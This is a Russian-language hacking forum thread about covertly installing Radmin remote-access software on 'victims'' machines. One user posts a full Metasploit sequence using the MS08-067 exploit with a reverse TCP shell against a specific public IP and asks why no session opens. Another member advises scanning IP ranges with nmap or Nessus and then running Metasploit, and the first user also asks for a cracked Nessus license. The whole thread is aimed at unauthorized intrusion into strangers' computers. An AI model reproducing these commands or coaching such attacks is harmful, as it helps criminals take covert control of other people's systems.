Установка тихой сборки Radmin 3.4 через пробитый шелл

Тема в разделе "Статьи", создана пользователем Iindigo, 4 дек 2010.

  1. Iindigo
    Iindigo Guest
    Либо запускаешь не от администратора, либо ставил не из под администратора, либо антивирус не даёт запуститься.
     
    17 мар 2011
  2. hacker011
    hacker011 Новичок
    Симпатии:
    0
    Привет всем!! форумчани помогите плиз... у меня не х...а не получается с метасплоитом, ввожу ип жертвы( сканил через XSpider) открыт порт 445 и 139, стараюсь подключатся но не получается, у жертвы инет 3G, ип динамический но 100% не за НАТ-ом, у меня ип тоже дин. но когда я ввожу ipconfig у меня показывает вот так 192.168.1.2 , у нас у всех клиентов билайна то же самое в ipconfig, но по моему в метасплоите будет глупо написать 192.168.1.2, ведь когда захожу в 2ip.ru там у меня ип 46.70.Х.Х а не 168.192.1.2, как у и других клиентов, помогите с этим справится!! допустим есть ип жертвы например это 46.130.22.32, я в метасплоите пишу!!!
    use windows/smb/ms08_067_netapi (потом пишу из сплоита нетапи)
    set RHOST 46.130.22.32
    set RPORT 445
    set LPORT 4444 (это всегда должно быть так или у каждого по своему если да то что написать)
    set LHOST 46.70.x.x (из 2ip.ru прокси не изпол. по моему будет глупо написать 192.168.1.2

    set PAYLOAD windows/shell/reverse_tcp
    exploit

    после этого все идет хорошо а потом пишет
    exploit completed but no session was created!!


    ПОМОГИТЕ РЕШИТЬ ТРАБЛУ!!!

    спасибо за понимания моего подробно изложенного текста и затрату вашего времени!
     
    18 мар 2011
  3. onthar
    onthar Продвинутый
    Симпатии:
    224
    3g как правило нат использует.
     
    18 мар 2011
  4. hacker011
    hacker011 Новичок
    Симпатии:
    0
    если был за натом то я наверника не смоб бы подключится через радмин))) к таких жертв, а у меня много таких жертв у каторых инет 3G, что можно придумать на счет метасплоита??
     
    18 мар 2011
  5. onthar
    onthar Продвинутый
    Симпатии:
    224
    система не уявзмима.

    да, тут внешний айпи.

    ну, по этому я и не написал, что всегда нат.
     
    18 мар 2011
  6. hacker011
    hacker011 Новичок
    Симпатии:
    0
    есть какие ниуть выходы, каким прогам посоветуешь сканит диапазоны с уязвимами портами 445? и что написать LPROT и LHOST
    у меня порт закрыт 4444, будет ли он работать в LPORT
    как я понел написать LHOST 46.70.x.x тоисть внешный йп?

    и важно каким прогом сканить диапазоны?
     
    18 мар 2011
  7. onthar
    onthar Продвинутый
    Симпатии:
    224
    в metasploit ест ьвстроенный сканер nmap.

    http://www.metasploit.com/framework/search - тут поиск уязвимостей.
     
    18 мар 2011
  8. hacker011
    hacker011 Новичок
    Симпатии:
    0
    Привет!! onthar а RPORT должен быть у всех 4444 или как это узнать чтоб написать в експлоите? спасибо!

    Добавлено через 1 минуту
    ИЗВИНИ LPORT

    Добавлено через 1 час 39 минут
    и еще вопрос какими портами можно еще кинуть радмин жертвы тем же способом?
     
    Последнее редактирование: 19 мар 2011
    19 мар 2011
  9. onthar
    onthar Продвинутый
    Симпатии:
    224
    lport не меняй.
    http://www.metasploit.com/framework/search - вот тут ищи, я написал же.
     
    19 мар 2011
  10. hacker011
    hacker011 Новичок
    Симпатии:
    0
    спасибо за ответ, а на счет ссылки я туда заходил но ничего не понял что где писать и какое толк от этой ссылки?? мне нужен знать могу ли я кинуть радмин через 139 или какую ниуть порт к жертвы если показывает в Xspider уязвимость, желтым!!
     
    19 мар 2011
  11. onthar
    onthar Продвинутый
    Симпатии:
    224
    этот сканнер давно не актуален.
     
    19 мар 2011
  12. hacker011
    hacker011 Новичок
    Симпатии:
    0
    Spasibo za otvet, a kakoe skaner ti rekamenduesh dlya etix celey, tolko davay ssilku programmi pojalusta ato iz sayta ya nayti tochno ne smogu)))
     
    20 мар 2011
  13. onthar
    onthar Продвинутый
    Симпатии:
    224
    hacker011,
    nessus - сканнер уязвимостей.
    nmap - сканер портов.

    в гугле по каждому запросу верхняя строка - оф.сайт. Учись искать. И на форуме на такие вопросы уже сто раз отвечали.
     
    20 мар 2011
  14. hacker011
    hacker011 Новичок
    Симпатии:
    0
    Spasibo ochen no nessus platniy i nigde ne mogu nayti besplatnuyu licenziyu, sluchayno u tya netu ne mojesh kinut mne na hacker011@yandex.ru
     
    22 мар 2011
  15. onthar
    onthar Продвинутый
    Симпатии:
    224
    hacker011, ищите все самостоятельно, хватит ныть. Весь необходимый материал в первом посте приведен. Берите сканнер портов, какой - я писал выше, берите диапазон, сканируйте, юзайте метасплоит.
    Все.
     
    22 мар 2011
  16. Iindigo
    Iindigo Guest
    Какие ссылки? В шапке все ссылки рабочие.
     
    5 апр 2011
  17. indogo
    indogo Новичок
    Симпатии:
    0
    Добавлено через 3 часа 52 минуты
    ну и че за... где ошибка?[​IMG]

    Добавлено через 4 часа 23 минуты
    ну ктонить помогите мне? я чет вкупится не могу... где у меня ошибка???
     
    Последнее редактирование: 5 апр 2011
    5 апр 2011
  18. onthar
    onthar Продвинутый
    Симпатии:
    224
    indogo,
    система неуязвима к данному сплоиту.
     
    5 апр 2011
  19. indogo
    indogo Новичок
    Симпатии:
    0
    как это? можно подробней разжувать.. я так то коев каких делах шарю.. но вот про это слышу первый раз.. вот и решил попробывать,но чет невыходит... эт че получается у меня руки не оттуда лезут..ХД.. яб не сказал...
     
    5 апр 2011
  20. onthar
    onthar Продвинутый
    Симпатии:
    224
    Система не подвержена этой уязвимости.
    Теперь только с другой пробовать. Так ясно?
    Отвечу сразу, с какой другой - не знаю, ищи те, в теме я уже писал выше.
     
    5 апр 2011
Загрузка...